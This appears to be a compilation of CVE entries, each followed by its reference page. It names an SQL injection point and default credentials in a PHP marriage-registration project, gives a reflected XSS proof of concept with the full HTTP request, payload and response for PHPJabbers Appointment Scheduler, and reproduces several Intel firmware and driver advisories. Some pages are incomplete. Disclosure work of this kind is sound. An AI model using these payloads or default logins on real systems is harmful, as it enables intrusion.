The Online Marriage Registration System 1.0 post parameter "searchdata" in the user/search.php request is vulnerable to Time Based Sql Injection.

**Online Marriage Registration System using PHP and MySQL**

  

**Online Marriage Registration System Inroduction**

Online Marriage Registration SystemO is a web-based technology that will manage the records of the marriage and generate marriage certificate. It’s an easy for Admin to retrieve the data of marriage couple. Online Marriage Registration System is an automatic system which delivers data processing in very high speed in systematic manner.

**Project Requirements**

**Project Name**

Online Marriage Registration System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In the Online Marriage Registration System, we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Dashboard**:  In this section, the admin can briefly view the total number of the new applications, total verified applications, and total rejected applications.

**2\. Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search applications with the help of the user registration number

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Dashboard**: In this section, user can view the welcome page of the web application.

**2\. Registration Form**: In this section, user can fill the form of marriage registration.

**3\. View Marriage Application:** In this section, user can take print of verified certificates of marriage.

Users can also update his profile, change their password, and recover their password.

****Some of the Project Screens****

**User Signup**

**Home Page**

**Marriage Certificate  
  
**

****How to run the Online Marriage Registration Project using PHP and MySQL****

1.Download the zip file

2.Extract the file and copy omrs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/Html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name omrsdb

6.Import omrsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/omrs

User Credential  
Username: 1234567890  
Password: Test@123

Admin Credential  
Username: admin  
Password: Test@123

****View Demo****

Download Full Source Code (Online Marriage Registration System Project)

Size: 10 MB

Version: V 1.0

**Project Report Link**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-35151: Online Marriage Registration System in PHP | Online Marriage Registration Project

Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.

    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)# Date: 2020-12-14# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.phpjabbers.com# Software Link: https://www.phpjabbers.com/appointment-scheduler# Version: 2.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)# CVE: CVE-2020-35416Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.PoC Request:GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1Host: [removed]Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://[removed]Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422PoC Response:HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Dec 2020 10:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Origin, X-Requested-WithContent-Length: 13988<div class="container-fluid">   <div class="row">       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">           <div class="panel panel-default pjAsContainer pjAsAside">               <div class="panel-heading p...[SNIP]...<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>...[SNIP]...PoC Screenshots:https://imgrz.com/item/naqZhttps://imgrz.com/item/ngZ1orhttps://imagebin.ca/v/5kkKgOdFS9n5https://imagebin.ca/v/5kkKlhi4amhj

CVE-2020-35416: PHPJabbers Appointment Scheduler 2.3 Cross Site Scripting ≈ Packet Storm

Out of bounds write in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi Software Advisory**

Intel ID:

INTEL-SA-00338

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

04/14/2020

Last revised:

02/11/2021

**Summary: **

Potential security vulnerabilities in some Intel® PROSet/Wireless WiFi products may allow escalation of privilege or denial of service. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-0557

Description: Insecure inherited permissions in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2020-0558

Description: Improper buffer restrictions in kernel mode driver for Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an unprivileged user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2020-0569  

Description: Out of bounds write in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi software for the following products before version 21.70:

Intel® Wi-Fi 6 AX201  
Intel® Wi-Fi 6 AX200  
Intel® Wireless-AC 9560  
Intel® Wireless-AC 9462  
Intel® Wireless-AC 9461  
Intel® Wireless-AC 9260  
Intel® Dual Band Wireless-AC 8265  
Intel® Dual Band Wireless-AC 8260  
Intel® Dual Band Wireless-AC 3168  
Intel® Wireless 7265 (Rev D) Family  
Intel® Dual Band Wireless-AC 3165

**Recommendations:**

Intel recommends updating the drivers and software for Intel® PROSet/Wireless WiFi products on Windows 10 to the versions listed below:

**Impacted Product**

**Updated Driver Version**

Intel® Wi-Fi 6 AX201

21.70.0.6

Intel® Wi-Fi 6 AX200

21.70.0.6

Intel® Wireless-AC 9560

21.70.0.6

Intel® Wireless-AC 9462

21.70.0.6

Intel® Wireless-AC 9461

21.70.0.6

Intel® Wireless-AC 9260

21.70.0.6

Intel® Dual Band Wireless-AC 8265

20.70.16.4

Intel® Dual Band Wireless-AC 8260

20.70.16.4

Intel® Dual Band Wireless-AC 3168

19.51.27.1

Intel® Wireless 7265 (Rev D) Family

19.51.27.1

Intel® Dual Band Wireless-AC 3165

19.51.27.1

Driver and software updates are available for download at this location.

Additional support information is available at the Wireless Support site.

**Acknowledgements:**

Intel would like to thank Kong, Haikuo Xie, Ying Wang and Andrew Hess for reporting these issues.  

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

04/14/2020

Initial Release

1.1

08/20/2020

Added CVE-2020-0569

1.2

11/25/2020

Updated CVE-2020-0569 to appropriately reflect an attack vector of adjacent.

1.3

02/11/2021

Updated Recommendations

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0569: INTEL-SA-00338

Improper access control in BlueZ may allow an unauthenticated user to potentially enable information disclosure via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**BlueZ Advisory**

Intel ID:

INTEL-SA-00435

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

HIGH

Original release:

10/13/2020

Last revised:

10/15/2020

**Revision History**

Revision

Date

Description

1.0

10/13/2020

Initial Release

1.1

10/15/2020

Removed reference to Linux kernel version

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-12352: INTEL-SA-00435

Improper input validation in the Auto-Discovery component of Nagios XI before 5.7.5 allows an authenticated attacker to execute remote code.

CVE-2020-28648: Nagios XI Change Log - Nagios

Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2020.2 IPU – BIOS Advisory**

Intel ID:

INTEL-SA-00358

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/10/2020

Last revised:

11/10/2020

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID:  CVE-2020-0590

Description: Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.7 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVEID:  CVE-2020-0587

Description: Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:L

CVEID:  CVE-2020-0591

Description: Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVEID:  CVE-2020-0593

Description: Improper buffer restrictions in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:L

CVEID:  CVE-2020-0588

Description: Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.8 Low

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N

CVEID:  CVE-2020-0592

Description: Out of bounds write in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or denial of service via local access.

CVSS Base Score: 3.0 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

**Affected Products:**

2nd Generation Intel® Xeon® Scalable and Intel® Xeon® Scalable Processors

*   CVE-2020-0590
*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593
*   CVE-2020-0587
*   CVE-2020-0588

Intel® Xeon® Processor D Family,  Intel® Xeon® Processor E5 v4 Family and Intel® Xeon® Processor E5 v3 Family              

*   CVE-2020-0591
*   CVE-2020-0592

10th Generation Intel® Core™ processors, 9th Generation Intel® Core™ processors, 8th Generation Intel® Core™ processors, 7th Generation Intel® Core™ processors, 6th Generation Intel® Core™ processors and

Intel® Core™ Processors with Intel® Hybrid Technology  

*   CVE-2020-0593

Intel® Xeon® Processor E7 v4 Family and Intel® Xeon® Processor E7 v2 Family      

*   CVE-2020-0592

Intel® Core™ X-series Processors and Intel® Xeon® Processor W Family   

*   CVE-2020-0587
*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593

Intel® Xeon® Processor D Family, Intel® Xeon® W Processor and Intel® Core™ X-series Processors

*   CVE-2020-0591
*   CVE-2020-0592
*   CVE-2020-0593

**Recommendations:  
**

Intel recommends that users of the affected products update to the latest BIOS firmware provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employees.  Intel would like to thank, Nagaraju N Kodalapura and Hareesh Khattri for CVE-2020-0590, Jorge E Gonzalez Diaz for CVE-2020-0588, Nicholas Armour for CVE-2020-0587, and Brent Holtsclaw for CVE-2020-0591 and CVE-2020-0591.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

1.1

03/15/2021

Updated affected products for CVE-2020-0591/0592

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0590: INTEL-SA-00358

Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel BIOS Platform Sample Code Advisory**

**Summary: **

Potential security vulnerabilities in Intel BIOS platform sample code for some Intel® Processors may allow escalation of privilege.  Intel is releasing BIOS platform sample code updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-8764

Description: Improper access control in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8738

Description: Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8740

Description: Out of bounds write in Intel BIOS platform sample code for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:L

CVEID: CVE-2020-8739

Description: Use of potentially dangerous function in Intel BIOS platform sample code for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L

**Affected Products:**

2nd Generation Intel® Xeon® Scalable Processors, Intel® Core™ X-series Processors, Intel® Xeon® Processor W Family and Intel® Xeon® Scalable Processors     

*   CVE-2020-8738
*   CVE-2020-8739
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor D Family, Intel® Xeon® Processor E7 v4 Family and Intel® Xeon® Processor E5 v3 Family, Intel® Xeon® Processor E5 v4 Family

*   CVE-2020-8738
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor D Family               

*   CVE-2020-8739
*   CVE-2020-8740
*   CVE-2020-8764

Intel® Xeon® Processor E7 v3 Family

*   CVE2020-8764

Intel® Atom® Processor C3XXX

*   CVE-2020-8738

Intel recommends that users of the affected products update to the latest BIOS firmware provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

Intel would like to thank Dmitry Frolov (CVE-2020-8738) for reporting this issue.

The following issues were found internally by Intel, CVE-2020-8739 and CVE-2020-8764.  Intel would like to thank Brent Holtsclaw for CVE-2020-8740.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/10/2020

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-8738: INTEL-SA-00390

Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2020.2 IPU – Intel® CSME, SPS, TXE, AMT and DAL Advisory**

Intel ID:

INTEL-SA-00391

Advisory Category:

Firmware, Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

CRITICAL

Original release:

11/10/2020

Last revised:

5/12/2022

**Summary: **

Potential security vulnerabilities in Intel® Converged Security and Manageability Engine (CSME), Server Platform Services (SPS), Intel® Trusted Execution Engine (TXE), Intel® Dynamic Application Loader (DAL), Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM) and Intel® Dynamic Application Loader (Intel® DAL) may allow escalation of privilege, denial of service or information disclosure.  Intel is releasing firmware and software updates to mitigate these potential vulnerabilities.

Intel is not releasing updates to mitigate a potential vulnerability and has issued a Product Discontinuation Notice for Intel® DAL SDK.

**Vulnerability Details:**

CVEID: CVE-2020-8752

Description: Out-of-bounds write in IPv6 subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow an unauthenticated user to potentially enable escalation of privileges via network access.

CVSS Base Score: 9.4 Critical

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8753

Description: Out-of-bounds read in DHCP subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

CVEID: CVE-2020-12297

Description: Improper access control in Installer for Intel(R) CSME Driver for Windows versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12304

Description: Improper access control in Installer for Intel(R) DAL SDK before version 2.1 for Windows   may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8745

Description: Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2020-8744

Description: Improper initialization in subsystem for Intel(R) CSME versions before12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel® TXE versions before 4.0.30 Intel(R) SPS versions before E3\_05.01.04.200 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.2 High

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2020-8705

Description: Insecure default initialization of resource in Intel(R) Boot Guard in Intel(R) CSME versions before 11.8.82, 11.12.82, 11.22.82, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 3.1.80 and 4.0.30, Intel(R) SPS versions before E5\_04.01.04.400, E3\_04.01.04.200, SoC-X\_04.00.04.200 and SoC-A\_04.00.04.300  may allow an unauthenticated user to potentially enable escalation of privileges via physical access.

CVSS Base Score: 7.1 High

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8750

Description: Use after free in Kernel Mode Driver for Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2020-12303

Description: Use after free in DAL subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel® TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2020-12354

Description: Incorrect default permissions in Windows(R) installer in Intel(R) AMT SDK versions before 14.0.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2020-8757

Description: Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

CVEID: CVE-2020-8756

